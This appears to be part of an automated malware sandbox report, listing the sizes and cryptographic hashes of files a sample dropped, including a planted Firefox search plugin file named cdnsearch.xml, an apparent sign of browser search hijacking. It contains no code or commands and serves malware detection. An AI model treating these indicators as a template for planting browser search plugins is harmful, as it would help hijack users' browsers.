MD5926a9def76ad857825c435eaabd4a686
SHA1b96e9857cba9fbca67d6cb9449b2218df4488517
SHA25677a1f38aa476f33cf8295028c24d846caa6445efd8cfca9ca85cb020085b64c3
SHA512e53f6d5ea7fd748615f8619abb3c77f635e4f7ad52873db19449e25407300cbd660533f2b2396a759c899f2f56e45f0686c4fcd430b580979cbb3a04547dd83b
-
Filesize
3KB
MD50456be6047774e5d0b8045b787048924
SHA176f6445368a4462a50e502bc272a8efc2eb33cb0
SHA2561c4440a8312e16bc682277164cc6710b37fc3dcac5ef9aa0ba7e77fc0c1f4897
SHA512c0f0cf97e0fd0b258b9a9fa6466dd9e390cd79f3edb0f5b9f10137c241c6b079061135c44c0c30dc71c28f1b7b929c65eb1112761e53cd8400d7e07ce1a7b99c
-
Filesize
6.4MB
MD5220a02a940078153b4063f42f206087b
SHA102fc647d857573a253a1ab796d162244eb179315
SHA2567eb93d93b03447a6bafd7e084305d41bf9780bd415cb2e70020952d06f3d7b60
SHA51242ac563a7c28cbf361bfb150d5469f0278ab87ce445b437eef8425fb779689d70230b550815f30f9db2909c1ba0dd015b172dfe3e718d26706856f4cb0eeeeaa
-
Filesize
2KB
MD51420d30f964eac2c85b2ccfe968eebce
SHA1bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA5126fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
2KB
MD5225a24b2b1db8875dd63772dd774f8c5
SHA1f03a34fcbb2f4f6fbced5c7e2ba948ab4a4399f9
SHA256204fc0f05cdc7b286efa13b6bead82dbb150af7270bf48af55960a9a83cd09c5
SHA5128cfcfde4c73877036a6ff1cab7b087c7c08a681d2cf38d02ba3ebfb6227af2de2d92ad3ad899abf9411b0649badac1f5d725055676d10c3f48ecb791f4f14bb6
-
Filesize
4KB
MD5b599cd62e315e347ee1684a48ee7a0fd
SHA10891fe52a9231fc66954092a39709dc95959c12f
SHA2566449707b4d6af7c59fb3266a52ed462277cfa26f456fdd1c2e11d253f457c0ac
SHA512239bc470920810f7921252f164c83ec6d30bde03c2723beca77c80ffea754362bb39b8f2a400d44a34d39352954d434cdc74826750434dcba2d3d777544b22a3
-
Filesize
274KB
MD5fae96a12ae35c2243801206ca089798d
SHA152b8769b202701900f03c386623232ee23fb90d3
SHA2561b32e30cfeea17e7f29f8c907c42cafc3a18da4306007b5c5bc38cb6bb4f1750
SHA5127a3d2284145b98b8db779e1a941f48125fd3fee00dc147fb6a2c0ecf0840b9c52973930871182e402726878de2bfb0dd7e4d64396e4280700511e2ac81aa7abe
-
Filesize
4.6MB
MD5397926927bca55be4a77839b1c44de6e
SHA1e10f3434ef3021c399dbba047832f02b3c898dbd
SHA2564f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954
-
Filesize
6.2MB
MD55638d57a305af6d979c2ff2f7634605a
SHA1d411fe7f10fe6488f4bbcc52704146d124177f9b
SHA256bc912349a4c6e0700e5709eed23eda3f1e5375c973b17de0c77a78398ca5db16
SHA512acea97ee145a44fecd8dd403f4045ddfb1a31d1a59dc5b700d564640c4fe1fecdf7f9efdb9fb996c52e7a5957bf09e12ba2852c9abd56ff2e8382283f648a990
-
Filesize
7KB
MD53fdbc03e8bccd8126ee1af86ca37ba00
SHA19f7b83ec581a7f9d430d46abeae0a32261aa1d48
SHA2561322c5512021f58f263d9f25fb9f41998f06965fcf38a06a0ae3cfc02727ee4f
SHA512ec53df9b6658ca0f596b1337dc5985bf7923e8996497a5fe8e1bdad3db700be64b7dfc2258b4ab703821b4a368abce6b8e63354a0e64a6ed66dc9bf097a2c5de
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\searchplugins\cdnsearch.xml
Filesize1KB
MD52869f887319d49175ff94ec01e707508
SHA1e9504ad5c1bcf31a2842ca2281fe993d220af4b8
SHA25649dd61e19d4541f1e695b66847d0bf99bc08952ba41b33a69c2e297dfa282d15
SHA51263673c1ede47fda14dea78483c6319132a849db3b35953e43704aa49cfb6d14e42d74e0eaf93f4cdb7632c85f368d484ac111687127d2b87a3e264949085c76b
-
Filesize
109KB
MD5726cd06231883a159ec1ce28dd538699
SHA1404897e6a133d255ad5a9c26ac6414d7134285a2
SHA25612fef2d5995d671ec0e91bdbdc91e2b0d3c90ed3a8b2b13ddaa8ad64727dcd46
SHA5129ea82e7cb6c6a58446bd5033855947c3e2d475d2910f2b941235e0b96aa08eec822d2dd17cc86b2d3fce930f78b799291992408e309a6c63e3011266810ea83e
-
Filesize
1.2MB
MD515a42d3e4579da615a384c717ab2109b
SHA122aeedeb2307b1370cdab70d6a6b6d2c13ad2301
SHA2563c97bb410e49b11af8116feb7240b7101e1967cae7538418c45c3d2e072e8103
SHA5121eb7f126dccc88a2479e3818c36120f5af3caa0d632b9ea803485ee6531d6e2a1fd0805b1c4364983d280df23ea5ca3ad4a5fca558ac436efae36af9b795c444
-
Filesize
304KB
MD50c582da789c91878ab2f1b12d7461496
SHA1238bd2408f484dd13113889792d6e46d6b41c5ba
SHA256a6ab532816fbb0c9664c708746db35287aaa85cbb417bef2eafcd9f5eaf7cf67
SHA512a1b7c5c13462a7704ea2aea5025d1cb16ddd622fe1e2de3bbe08337c271a4dc8b9be2eae58a4896a7df3ad44823675384dbc60bdc737c54b173909be7a0a086a
-
Filesize
750KB
MD520ae0bb07ba77cb3748aa63b6eb51afb
SHA187c468dc8f3d90a63833d36e4c900fa88d505c6d
SHA256daf6ae706fc78595f0d386817a0f8a3a7eb4ec8613219382b1cbaa7089418e7d
SHA512db315e00ce2b2d5a05cb69541ee45aade4332e424c4955a79d2b7261ab7bd739f02dc688224f031a7a030c92fa915d029538e236dbd3c28b8d07d1265a52e5b2
-
Filesize
4.2MB
MD585e00972e4d4b2ad827d5e72daa72c86
SHA1b285d5343385c9e9a7c706b1a48c651cd3a5a5cc
SHA256bfde9d0144b50dfc923ed9d605f029adc8a2b8460644a63c7bde3ea43e27cc8e
SHA512d9c93929534de4ac4357814b8e3b2a0dc880e12290c6a365746c0eb19fcf6113591322de53856c0d79c1d0bc2ae3294a149a239259426dca5e46e8d5113eea7b
-
Filesize
7KB
MD577f762f953163d7639dff697104e1470
SHA1ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499
-
Filesize
4.2MB
MD5efae9751274c1f945b8ec66a3abd2b18
SHA1b594572da253d2bf0bce3116e20207f83fe9146a
SHA256982360750abf4da2df89ef95841082796ad08198b3170006339ef2f4241c2ea0
SHA51255840871865c3748402a2b9474926d08cc85af91287c512e08d7de148adef745b7e0e80bc24566c6aa633ea9646a95397c70bc85c053f0e699f8b54b34a7fa4b
-
Filesize
416KB
MD5802c6bc6230b334e1f09cc9abc29e693
SHA1f92c01964a9010a5bdbb613abaa6b5114651d1ab
SHA256501c2f7253cc227dfc4737f31fe6a685f12dc21fadc076e23e44eaf8bdc31391
SHA512da8f0a153a0e2c305d6218272cb4e489bb7cc7defcac2e52fe9ca87b210abc9bfc51564535116695a3003303a441d3e55d91c3247a0fb7d3ee41f8c441135e10
-
Filesize
2KB
MD5bbd926e228027517d5c6176c85a68569
SHA1ba334fd2111fe358cc710598cc23a28c680beecf
SHA2561a7def19519d17495270381b82f955f870ec38e4e9c8835dc59d2edf2572b865
SHA5127a0f9a22fe40acdb41f6524d7a0c70c81fbe79170cb2016153c90aba05924bc0963f59d0eee77917c39b77b7355ef4e41ca9807d070649d55fec55f48ca29044
-
Filesize
127B
MD58ef9853d1881c5fe4d681bfb31282a01
SHA1a05609065520e4b4e553784c566430ad9736f19f
SHA2569228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA5125ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005